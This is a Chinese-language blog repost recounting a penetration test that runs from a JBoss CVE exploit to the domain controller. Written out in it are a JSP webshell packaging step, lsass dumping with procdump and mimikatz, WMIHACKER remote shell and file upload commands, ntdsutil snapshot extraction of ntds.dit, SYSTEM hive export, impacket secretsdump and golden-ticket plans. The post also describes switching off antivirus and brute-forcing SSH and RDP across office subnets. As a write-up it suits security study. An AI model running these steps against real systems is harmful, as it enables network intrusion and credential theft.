来源：黑白天实验室，作者@jen，经“@李木”师傅同意转发至公众号！

0x00 前言

这次渗透测试是从一个CVE开始的，从CVE到内网然后到域控！手法简单！还是要多学习哈哈哈哈！啊啊啊，我想开学了！为什么不开学

0x01 一切从CVE开始

使用网上提供的EXP和利用方法，在VPS上面获取了一个shell。这里看到对方是windows系统，当前用户权限是管理员权限。并且该机器具有四张网卡，通向了四个网段！

../../../server/default/deployjar -cvf  shell.war  shell.jsp

接着我上传了一个对免杀效果还是挺OK的马儿上去！但是也被杀了！看了免杀不到位啊。这里使用只能通过当前管理员权限创建一个用户，代理进入内网通过3389进去到对方机器了！

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

并且再第二处也留下了用户名和密码！这里密码收集起来可以后期可以进行利用。

利用刚刚mimikatz获取出来的用户名和密码登陆进入这台具有四张网卡的JBoss主机上面！其实最强的免杀应该就是没有杀软吧哈哈哈哈哈！[暴龙点赞] 利用该管理员用户权限直接关闭微软的自带杀软后上线CobaltStrike

进去之后枚举域，发现存在挺多域的。通过对内网445端口的扫描返回的信息发现内网中大多主机都是再域ANDXXXXX中

直接ping 一下域名发现域控可能部署再192.168.1.5中，但是使用其他工具并不能获取到准确的域控信息

接着对内网的主机进行信息探测，对四个网段进行了探测扫描，发现192.168.1.0/24网段的主机很多ms17-010。并且windows7的主机比较多，但是依次对其进行ms17-010攻击并不能获取到shell。这里推测是杀软或者防火墙的锅。但是在192.168.8.0/24网段中成功打中了一台windows 2008服务器。

接着load上去mimikatz直接获取里面的凭证信息，并且获取到了明文的凭证信息（原谅我这懒惰的打码）

对这台主机进行3389端口扫描发现器开启了3389端口，远程登陆进去发现其不能出网！

一开始在MSF里面执行一些操作也是不能执行，发现进去之后有一个杀软ESET，并且关闭杀软需要密码。（啊....这！）

首先我想了一个办法，通过WEB机器远程进去到这台机器上面，通过远程桌面自带的磁盘共享分享木马或者工具到这台window 2008的系统上面。我首先把中转木马上去，直接被杀了！搞了一个免杀的密码上去却提示不能执行（啊！.... 原来我太菜了！）

接着我直接上传procdump获取这台主机的密码。然后dump下来使用mimikatz获取里面的数据。并且对这些密码进行了整理！接着使用CobaltStrike的插件对内网主机进行暴力破解，破解192.168.1.0/24网段有挺多主机是相同密码的。

接着上线了这里面的两台主机分别是192.168.1.46和192.168.1.180。接下来可以对这两台主机进行信息搜集。

登陆192.168.1.96和192.168.1.120发现是一台VNC登陆的机器。里面是登陆一台Linux，而且好像是虚拟机

接着使用远程桌面也上线一台win7主机。IP地址为192.168.1.203。但是是工作组的机器，应该是机器了

接着对192.168.1.0/24网段进行ssh主机的弱口令扫描。发现如下可以连接

接着对192.168.5.0/24网段进行爆破。爆破出了一个我没有登陆过的主机192.168.1.193

登陆进去是一个Windows 2008的操作系统，并且这个主机有一张网卡是100.0.0.101的IP。这里又通向新的网段

进去之后发现它的IP地址是192.168.1.90。可以看到它这些网段大多数主机都是相同的。接着来可以对这台主机进行密码获取。然后再对密码进行收集整理。再进行爆破

在这台主机发现他这里有远程桌面到其他主机，对方是Linux主机，这台应该就是管理机器了吧

接着还可以对内网资产进行扫描，发现了现内网很多JBoss但是主机都已经获取权限下来了！并且192.168.1.0/24这个网段很多永恒之蓝，但是都打不通，我怀疑就是杀软的锅，把payload 拦截了！

项目地址：https://github.com/360-Linton-Lab/WMIHACKER

cscript //nologo WMIHACKER_0.6.vbs /shell 192.168.1.26 administrator "password"

接着上传一个procdump到对方主机上面。命令如下

cscript //nologo WMIHACKER_0.6.vbs /upload 192.168.1.122 administrator "password" "C:\Windows\Temp\procdump64.exe" "C:\Windows\Temp\procdump64.exe"

我直接查看一些远程连接，发现由远程连接记录。然后打开远程桌面发现这里留有远程登陆192.168.1.122的记录

接着我使用登陆192.168.1.134的密码登陆进入了192.168.1.122。这也太巧了吧！

接着通过远程桌面登陆进去了192.168.1.122。这里推测管理员应该是做了策略只允许192.168.1.134登陆这台机器，在一开始远程RDP却登陆不了192.168.1.122。进去之后发现是一个子域。真的是太幸运了！但是对方主机不能上线，这个域控开启了eset和微软的杀软，这里我直接拖下它的dmp获取密码hash。最后发现其192.168.1.134一个存储服务器，192.168.1.122里面的数据都通向192.168.1.134。

接着可以通过导出这个域控的ntds.dit文件出来获取域控krbtgt的hash出来

#创建快照，该快照包含Windows中的所有文件，且在复制时不会受到Windows锁定机制的影响ntdsutil snapshot "activate instance ntds" create quit quit#加载刚刚创建的快照，GUID是上一步创建快照的GUID,会生成一个挂载目录ntdsutil snapshot "mount  {c668674b-0a7d-4b97-bef1-4fb58f683e57} " quit quit#使用copy命令将快照中的文件复制到 c:\ntds.ditcopy  C:\$SNAP_202008160748_VOLUMEC$\\windows\ntds\ntds.dit c:\ntds.dit#将之前加载的快照卸载并删除ntdsutil snapshot "mount {c668674b-0a7d-4b97-bef1-4fb58f683e57}" "delete 2beb2b98-2375-46b5-a618-d4193f9f9610}" quit quit#再次查询当前系统中的所有快照，显示没有任何快照，表示快照删除成功ntdsutil snapshot "List All" quit quit

接着在域控导出ntds.dit后，还需要导出system.hive。因为system.hive中存放着ntds.dit的密钥。

reg save hklm\system c:\system

使用 impacket 工具包中的 secretdump.py 也可以解析 ntds.dit 文件，导出散列值。

impacket-secretsdump -system system -ntds ntds.dit LOCAL

接着通过krbtgt的hash制作黄金票据。

最后对域控和之前横向获取的主机进行密码的整理，虽然不能通过445批量上线全部主机，但是对开启了3389的主机进行登陆都是可以成功的登陆的！在192.168.1.0/24这个网段的主机 windows 7 居多是办公网段！并且存在ms17-010,但是大多不能利用。

经过了这个漫长的寒暑假[是真的长！]终于可以回学校了！准备会很少写博客了！接下来我的学习计划就是想把Linux系统和Windows系统的知识在加强！希望能成为一个差不多的运维 ^_^ 接着就是11月份的网络工程师哈哈哈！成为一个合格的网络工程师 ^_^ ，接着在成为一个不合格的程序员哈哈哈哈！